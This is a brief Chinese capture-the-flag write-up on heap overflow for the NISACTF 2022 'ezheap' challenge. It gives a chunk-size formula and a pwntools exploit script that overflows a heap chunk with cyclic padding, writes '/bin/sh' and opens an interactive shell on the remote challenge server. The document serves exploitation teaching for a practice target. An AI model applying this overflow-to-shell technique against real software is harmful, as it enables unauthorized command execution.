PWN入门-堆溢出漏洞

[NISACTF 2022]ezheap

实际堆栈分配大小计算式：

real_size=(allocated_size+0x4+0x7)&~0x7

exp：

from pwn import *
context(log_level='debug',os='linux',arch='i386')
p=remote("node5.anna.nssctf.cn",28346)
allocated_size=0x16
real_size=(allocated_size+0x4+0x7)&~0x7
heap_overflow=cyclic(real_size)
shellcode=b'/bin/sh\x00'
payload1=flat([heap_overflow,shellcode])
p.sendline(payload1)
p.interactive()